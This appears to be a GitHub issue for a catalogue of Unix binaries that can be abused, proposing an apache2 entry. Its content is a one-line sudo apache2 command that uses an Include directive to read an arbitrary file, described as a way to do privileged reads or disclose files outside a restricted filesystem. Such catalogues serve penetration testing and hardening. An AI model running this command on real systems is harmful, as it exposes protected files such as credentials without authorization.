-
Notifications
You must be signed in to change notification settings - Fork 1.4k
Open
Description
Add an apache2 program, with the ability to read files as SUDO/SUID.
File read
It reads data from files, it may be used to do privileged reads or disclose files outside a restricted file system.
LFILE=file_to_read
sudo /usr/sbin/apache2 -C 'Define APACHE_RUN_DIR /tmp' -C 'Include $LFILE' -k stop
Metadata
Metadata
Assignees
Labels
No labels